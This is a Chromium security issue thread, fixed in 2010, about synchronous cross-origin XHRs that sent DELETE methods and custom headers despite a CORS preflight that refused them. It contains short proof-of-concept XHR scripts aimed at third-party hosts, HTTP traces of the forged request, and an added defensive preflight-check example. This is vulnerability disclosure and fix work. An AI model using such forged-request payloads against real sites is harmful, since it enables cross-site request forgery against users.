Issue metadata

Status: Fixed
Closed: Apr 2010
Pri: 1
Type: Bug-Security

Issue 39698: Security: Synchronous preflight XHR allows arbitrary XSRF

Reported by meder@google.com, Mar 29 2010 Project Member

Issue description

It's possible to specify HTTP method using XHR across domains:

<body>
  <script>
    // Synchronous cross-origin XHR with a non-simple method (DELETE).
    // Per CORS this must be preflighted with OPTIONS and only sent if the
    // preflight response allows it; the bug is that it is sent regardless.
    var xhttp = new XMLHttpRequest();
    xhttp.open("DELETE", "http://o0o.nu/index.html", false);
    xhttp.send("");
    var xmlDoc = xhttp.responseXML;

    alert(xmlDoc);
  </script>
</body>

Comment 1 by abarth@chromium.org, Mar 29 2010

If this reproduces in WebKit nightly (which I'd expect it does), we'll want to track
this issue in bugs.webkit.org.

Comment 2 by abarth@chromium.org, Mar 29 2010

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High

Comment 3 by meder@google.com, Mar 29 2010

Custom headers are allowed too:
    // Same as above, but a GET carrying a non-safelisted header; this too
    // requires a preflight before the real request may be sent.
    var xhttp = new XMLHttpRequest();
    xhttp.open("GET", "http://o0o.nu/index.html", false);
    xhttp.setRequestHeader('X-XSRF-SPOOF', 'YES');
    xhttp.send("");

Comment 4 by lcam...@gmail.com, Mar 29 2010

Status: Untriaged
It reproduces on WebKit nightly. My hope is that someone on Chrome will be able to 
look into it, though, and scan through the entire implementation perhaps.

This is the principal security mechanism in XDC, so it's sad it shipped without a 
single test :-(

Comment 5 by jsc...@chromium.org, Mar 29 2010

Comment 6 by abarth@chromium.org, Mar 29 2010

I'll look into it.  The implementation has many tests.  It will be interesting to see
how this slipped through.

Comment 7 by infe...@chromium.org, Mar 29 2010

Here is what is happening: we are sending the OPTIONS request, just like Firefox.
However, it looks like there is some error in processing the response, which clearly says
DELETE is not supported. Still, we are sending the DELETE request.

----
GET /fd/page.html HTTP/1.1
Host: infernohacks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.365.0 Safari/533.3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "5c681ad-127-482f3b2300d40"
If-Modified-Since: Mon, 29 Mar 2010 17:18:05 GMT
----
OPTIONS /security/spoofpt.html HTTP/1.1
Host: securethoughts.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.365.0 Safari/533.3
Referer: http://infernohacks.com/fd/page.html
Access-Control-Request-Method: DELETE
Origin: http://infernohacks.com
Access-Control-Request-Headers: X-XSRF-SPOOF, Content-Type
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
---response---
HTTP/1.1 200 OK
Date: Mon, 29 Mar 2010 17:20:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Allow: GET,HEAD,POST,OPTIONS
Content-Length: 0
Content-Type: text/html
---

--- bad part ---
DELETE /security/spoofpt.html HTTP/1.1
Host: securethoughts.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.365.0 Safari/533.3
Referer: http://infernohacks.com/fd/page.html
Content-Length: 0
Origin: http://infernohacks.com
X-XSRF-SPOOF: YES
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

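The following is an added example, not WebKit or Chromium code, showing the decision a browser has to make after the preflight in the trace above (and the one missing for the reporter's DELETE and X-XSRF-SPOOF cases in comments 0 and 3): which requests need a preflight at all, and whether a given preflight response actually grants the method and headers. The "captured" response headers are transcribed from the trace in comment 7; the permissive response and the test requests are constructed for contrast. The point the check makes explicit is that the server's `Allow: GET,HEAD,POST,OPTIONS` is irrelevant to CORS: with no `Access-Control-Allow-*` headers at all, the DELETE must never leave the browser.

```javascript
// Added example (not WebKit/Chromium code): the post-preflight check a
// browser must run before sending a non-simple cross-origin XHR.

const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SIMPLE_CONTENT_TYPES = new Set(["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]);

// A request header may be sent without preflight only if its name is on the
// safelist and, for Content-Type, its media type is one of the form-style
// values. Anything else (X-XSRF-SPOOF, application/xml) needs approval.
function isSafelistedHeader(name, value) {
  const n = name.toLowerCase();
  if (!SAFELISTED_HEADERS.has(n)) return false;
  if (n !== "content-type") return true;
  return SIMPLE_CONTENT_TYPES.has(String(value).split(";")[0].trim().toLowerCase());
}

// True if the request is not "simple" and must be preflighted with OPTIONS.
function needsPreflight(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  return Object.entries(headers).some(([n, v]) => !isSafelistedHeader(n, v));
}

// Parse "Name: value" lines into a map keyed by lowercase header name.
function parseHeaders(raw) {
  const map = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i > 0) map[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return map;
}

function tokenList(value) {
  return value ? value.split(",").map((s) => s.trim()).filter(Boolean) : [];
}

// Given the preflight status and response headers, may the actual request
// (origin + method + headers) be sent? A plain "Allow:" header grants
// nothing; only Access-Control-Allow-Origin/-Methods/-Headers do.
function preflightAllows(origin, method, requestHeaders, status, rawResponseHeaders) {
  const h = parseHeaders(rawResponseHeaders);
  if (status < 200 || status >= 300) return { ok: false, reason: "preflight status " + status };

  const allowOrigin = h["access-control-allow-origin"];
  if (allowOrigin !== "*" && allowOrigin !== origin) return { ok: false, reason: "origin not allowed" };

  const m = method.toUpperCase();
  const allowedMethods = new Set(tokenList(h["access-control-allow-methods"]).map((s) => s.toUpperCase()));
  if (!SIMPLE_METHODS.has(m) && !allowedMethods.has(m)) return { ok: false, reason: "method " + m + " not allowed" };

  const allowedHeaders = new Set(tokenList(h["access-control-allow-headers"]).map((s) => s.toLowerCase()));
  for (const [name, value] of Object.entries(requestHeaders)) {
    if (isSafelistedHeader(name, value)) continue;
    if (!allowedHeaders.has(name.toLowerCase())) return { ok: false, reason: "header " + name + " not allowed" };
  }
  return { ok: true, reason: "" };
}

// Transcribed from the preflight exchange in comment 7: a 200 with an
// Allow: header but no Access-Control-* headers whatsoever.
const TRACE_ORIGIN = "http://infernohacks.com";
const TRACE_METHOD = "DELETE";
const TRACE_REQUEST_HEADERS = { "X-XSRF-SPOOF": "YES", "Content-Type": "application/xml" };
const TRACE_RESPONSE = [
  "Date: Mon, 29 Mar 2010 17:20:46 GMT",
  "Allow: GET,HEAD,POST,OPTIONS",
  "Content-Length: 0",
  "Content-Type: text/html",
].join("\r\n");

// Constructed for contrast: what the server would have to answer for that
// DELETE with those headers to be legitimately allowed.
const PERMISSIVE_RESPONSE = [
  "Access-Control-Allow-Origin: http://infernohacks.com",
  "Access-Control-Allow-Methods: DELETE, PUT",
  "Access-Control-Allow-Headers: X-XSRF-SPOOF, Content-Type",
].join("\r\n");

function checkTraceFromIssue() {
  return preflightAllows(TRACE_ORIGIN, TRACE_METHOD, TRACE_REQUEST_HEADERS, 200, TRACE_RESPONSE);
}

function checkPermissiveResponse() {
  return preflightAllows(TRACE_ORIGIN, TRACE_METHOD, TRACE_REQUEST_HEADERS, 200, PERMISSIVE_RESPONSE);
}

console.log("trace response:", checkTraceFromIssue());          // ok: false, "origin not allowed"
console.log("permissive response:", checkPermissiveResponse()); // ok: true
```

Run it with `node`. The first result is the verdict the browser should have reached for the trace above (the DELETE is refused before the origin check even gets to methods or headers); the second shows the three grants a server must make before a cross-origin DELETE carrying a custom header is sent, which is exactly why a custom-header requirement is a usable XSRF defence only as long as the browser enforces this check.
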
Comment 8 by infe...@chromium.org, Mar 29 2010

The issue does not reproduce on Safari, so it looks like a problem in our bindings.
Just analyzing the bug to learn the WebKit core :)

Comment 9 by abarth@chromium.org, Mar 29 2010

@inferno:  Thanks for the analysis.  You're welcome to take the bug if you'd like to
learn the full WebKit process.  :)

Comment 10 by jsc...@chromium.org, Mar 29 2010

I talked to inferno and it looks like this might be in our network layer. If there are 
no objections, I'm going to grab it.

Comment 11 by karen@chromium.org, Mar 30 2010

Labels: Mstone-5

Comment 12 by jsc...@chromium.org, Mar 30 2010

Status: Started
The bug is definitely in WebKit. I reported it here: 
https://bugs.webkit.org/show_bug.cgi?id=36843

Comment 13 by jsc...@chromium.org, Apr 1 2010

Summary: Security: Synchronous preflight XHR allows arbitrary XSRF
The problem applies to any synchronous preflight XHR, and appears to have been 
introduced in WebKit r47291. I have a WebKit patch up for review that includes tests 
for similar regressions in the future.

Comment 14 by jsc...@chromium.org, Apr 3 2010

Committed upstream in r57041: http://trac.webkit.org/changeset/57041
This should be a clean merge if someone wants to do it before I get back to my dev box 
on Monday.

Comment 15 by scarybea...@gmail.com, Apr 5 2010

Labels: -Mstone-5 Mstone-4.1
Status: FixUnreleased
http://src.chromium.org/viewvc/chrome?view=rev&revision=43595

Comment 16 by scarybea...@gmail.com, May 19 2010

Labels: -Restrict-View-SecurityTeam
Status: Fixed
Was fixed in 4.1.249.1059

Comment 17 by jsc...@chromium.org, Mar 21 2011

Labels: Type-Security

Comment 18 by jsc...@chromium.org, Oct 5 2011

Labels: SecImpacts-Stable
Batch update.

Comment 19 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 20 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Area-WebKit -SecSeverity-High -Type-Security -SecImpacts-Stable Cr-Content Security-Impact-Stable Security-Severity-High Type-Bug-Security

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 23 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 24 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic
